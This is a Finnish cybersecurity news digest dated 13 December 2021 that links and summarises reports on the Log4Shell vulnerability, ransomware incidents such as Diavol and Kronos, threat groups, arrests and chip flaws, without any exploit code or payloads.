Daily NCSC-FI news followup 2021-12-13

Log4j-varoitus punaiseksi – yksi merkittävimpiä haavoittuvuuksia

www.kyberturvallisuuskeskus.fi/fi/varo_ttn2_5/2021 10.12.2021 julkaistu keltainen varoitus on muutettu punaiseksi haavoittuvuuden vakavuuden tarkennuttua. Internetpalveluissa erittäin laajasti käytetyn, haavoittuvan Log4j-komponentin hyväksikäyttötapauksia havaitaan jatkuvasti lisää. Ylläpitäjiltä vaaditaan nopeaa reagointia. Vastaamme tässä artikkelissa myös aihetta koskeviin usein kysyttyihin kysymyksiin.

Internetistä löytyi haavoittuvuus, joka koskee käytännössä jokaista käyttäjää, hyväksikäyttöyritysten määrä räjähti viikonloppuna

www.hs.fi/talous/art-2000008472050.html Tietoturvatutkijat kertoivat viime viikolla haavoittuvuudesta, joka on löydetty avoimen lähdekoodin ohjelmistoja tarjoavan Apache-järjestön Log4j-komponentista. Haavoittuvuuteen liittyvien hyväksikäyttöyritysten määrä kasvoi viikonlopun aikana räjähdysmäisesti, kertoo Liikenne- ja viestintävirasto Traficomin Kyberturvallisuuskeskus. “Aika hyvä tiivistys tilanteesta on, että internet on tulessa eikä tavallinen kansalainen voi tehdä asialle mitään”, sanoo keskuksen tietoturva-asiantuntija Juho Jauhiainen.

Java-aukon vakavuus kirkastui: “Internet on tulessa”

www.tivi.fi/uutiset/java-aukon-vakavuus-kirkastui-internet-on-tulessa/5155b7b1-57d2-4b4b-8b09-318b50de6c35 Yksi pieni tekstinpätkä: kopioi ja liitä oikeaan paikkaan ja valmista. Vastikään julkistettu, nimen Log4shell saanut nollapäivähaavoittuvuus on kuin yleisavain internetiin. Se vaikuttaa miljooniin yhtiöihin, ja sen hyväksikäyttö on niin helppoa, että jopa Pihtiputaan mummo voisi sen avulla murtautua palvelimelle etänä ilman kirjautumista järjestelmään. myös:

www.is.fi/digitoday/tietoturva/art-2000008471124.html. myös:

www.iltalehti.fi/tietoturva/a/9408b302-744c-4afa-9b17-6d3f881ba470

log4shell – Quick Guide

musana.net/2021/12/13/log4shell-Quick-Guide/

Log4Shell explained how it works, why you need to know, and how to fix it

nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/

Ten families of malicious samples are spreading using the Log4j2 vulnerability Now

blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/ Over the past 2 days, we have captured samples from other families, and now the list of families has exceeded 10. It looks like the race between the offense and defense has started, and the offense side is wasting no time to jump into the game.

log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228

research.nccgroup.com/2021/12/12/log4j-jndi-be-gone-a-simple-mitigation-for-cve-2021-44228/ In this post, we first offer some context on the vulnerability, the released fixes (and their shortcomings), and finally our mitigation (or you can skip directly to our mitigation tool here).

Bitcoin-huijarit vievät uhreiltaan miljoonia ja henkilötiedot suomalainen voi päätyä tietämättään osalliseksi jopa huumekartelliin

yle.fi/uutiset/3-12225404 Huijarit veivät Jarmolta lähes sata tuhatta euroa. MOT-toimitus alkoi selvittää tapausta ja päätyi valtavan huijaustehtaan jäljille.

Diavol Ransomware

thedfirreport.com/2021/12/13/diavol-ransomware/ The malware (BazarLoader) was delivered to an endpoint via email, which included a link to OneDrive. The OneDrive link, directed the user to download a file that was a zip, which included an ISO inside. Once opened (mounted) on the users system, it was determined the ISO contained a LNK file and a DLL. The LNK file masqueraded as a Document enticing the user to click/open it. Once the user executed the LNK file, the BazarLoader infection was initiated. After around 42 hours post initial intrusion, the threat actors pushed towards completion of their final objective. RDP access was established from the central file server that the threat actors had compromised to all endpoints and a batch script named “kill.bat” was executed on all of the targeted machines.

Karakurt rises from its lair

www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation Accenture Security has identified a new threat group, the self-proclaimed Karakurt Hacking Team, that has impacted over 40 victims across multiple geographies. The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big game hunting approach. Based on intrusion analysis to date, the threat group focuses solely on data exfiltration and subsequent extortion, rather than the more destructive ransomware deployment. In addition, Accenture Security assesses with moderate-to-high confidence that the threat group’s extortion approach includes steps to avoid, as much as possible, drawing attention to its activities.

Cyber-attack on Hellmann Worldwide Logistics

www.infosecurity-magazine.com/news/cyberattack-on-hellmann-worldwide/ A cyber-attack has been carried out against major German logistics provider Hellmann Worldwide Logistics. Hellmann said that since the attack was discovered, it has been under the constant observation of its Global Crisis Taskforce, which is analyzing the incident. The company has also hired “external renowned security specialists” to investigate the attack. Hellmann did not disclose the exact nature of the attack, which is still under investigation.

Kronos ransomware attack may cause weeks of HR solutions downtime

www.bleepingcomputer.com/news/security/kronos-ransomware-attack-may-cause-weeks-of-hr-solutions-downtime/ Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks. Kronos is a workforce management and human resources provider who provides cloud-based solutions for managing timekeeping, payroll, employee benefits, analytics, and more. In 2020, Kronos merged with Ultimate Software to create a new company named UKG. Kronos’ software is used by many companies, including car manufacturers, education institutions, and local governments. Some of the customers using Kronos include Tesla, Temple University, Community Bank, and the San Francisco Municipal Transit Authority,. also:

community.kronos.com/s/feed/0D54M00004wJKHiSAO?language=en_US

A Look Into Purple Fox’s Server Infrastructure

www.trendmicro.com/en_us/research/21/l/a-look-into-purple-fox-server-infrastructure.html By examining Purple Fox’s routines and activities, both with our initial research and the subject matter we cover in this blog post, we hope to help incident responders, security operation centers (SOCs), and security researchers find and weed out Purple Fox infections in their network.

Ransomware affiliate arrested in Romania

therecord.media/ransomware-affiliate-arrested-in-romania/ Romanian police have detained a 41-year-old suspect today in the city of Craiova on suspicion of participating in ransomware attacks across the globe. He is believed to be a so-called “ransomware affiliate, ” a term used to describe cyber-criminals who rent access to ransomware, hack into corporate networks, and then deploy it against their targets.

Ukraine arrests 51 for selling data of 300 million people in US, EU

www.bleepingcomputer.com/news/security/ukraine-arrests-51-for-selling-data-of-300-million-people-in-us-eu/ Ukrainian law enforcement arrested 51 suspects believed to have been selling stolen personal data on hacking forums belonging to hundreds of millions worldwide, including Ukraine, the US, and Europe. “As a result of the operation, about 100 databases of personal data relevant for 2020-2021 were seized, ” the Cyberpolice Department of the National Police of Ukraine said. “The seized databases contained information on more than 300 million citizens of Ukraine, Europe and the United States”

Intel adds payout bonuses as it migrates bug bounty program to Intigriti

portswigger.net/daily-swig/intel-adds-payout-bonuses-as-it-migrates-bug-bounty-program-to-intigriti Intel is applying a 12-month bonus incentive to bug bounty rewards on select lines of hardware and firmware, which lifts the payout ceiling for the most critical bugs from $100, 000 to $150, 000.

Bugs in billions of WiFi, Bluetooth chips allow password, data theft

www.bleepingcomputer.com/news/security/bugs-in-billions-of-wifi-bluetooth-chips-allow-password-data-theft/ Researchers at the University of Darmstadt, Brescia, CNIT, and the Secure Mobile Networking Lab, have published a paper that proves it’s possible to extract passwords and manipulate traffic on a WiFi chip by targeting a device’s Bluetooth component. In their paper, the researchers explain how they could perform OTA (Over-the-Air) denial of service, code execution, extract network passwords, and read sensitive data on chipsets from Broadcom, Cypress, and Silicon Labs. Research paper (PDF): arxiv.org/pdf/2112.05719.pdf

You might be interested in …

Daily NCSC-FI news followup 2021-08-22

Applen tietoja vuotanut työntekijä tuli katumapäälle Paljasti yhteisönsä jäseniä, jäi ilman minkäänlaista korvausta www.kauppalehti.fi/uutiset/applen-tietoja-vuotanut-tyontekija-tuli-katumapaalle-paljasti-yhteisonsa-jasenia-jai-ilman-minkaanlaista-korvausta/8cea66c6-e206-47b6-acb3-879f856c7445 Tiedot uusista, vielä julkaisemattomista Apple-tuotteista ovat kuumaa kamaa internetissä, koska laitteet ovat niin suosittuja ympäri maailman. Siksi niistä myös maksetaan, ja moni pyrkii saamaan haltuunsa salaisia tietoja. Tietovuotajien toiminta kiinnostaa luonnollisesti myös Applea. Motherboard on julkaissut artikkelin Apple-vuotajana pitkään toimineesta Andrej […]

Read More

Daily NCSC-FI news followup 2019-11-14

Qualcomm Chip Flaws Let Hackers Steal Private Data From Android Devices thehackernews.com/2019/11/qualcomm-android-hacking.html According to a report cybersecurity firm CheckPoint shared with The Hacker News, the flaws could allow attackers to steal sensitive data stored in a secure area that is otherwise supposed to be the most protected part of a mobile device.. Report at research.checkpoint.com/the-road-to-qualcomm-trustzone-apps-fuzzing/ […]

Read More

Daily NCSC-FI news followup 2021-04-08

Researchers uncover a new Iranian malware used in recent cyberattacks thehackernews.com/2021/04/researchers-uncover-new-iranian-malware.html An Iranian threat actor has unleashed a new cyberespionage campaign against a possible Lebanese target with a backdoor capable of exfiltrating sensitive information from compromised systems. APT34 (aka OilRig) is known for its reconnaissance campaigns aligned with the strategic interests of Iran, primarily hitting […]

Read More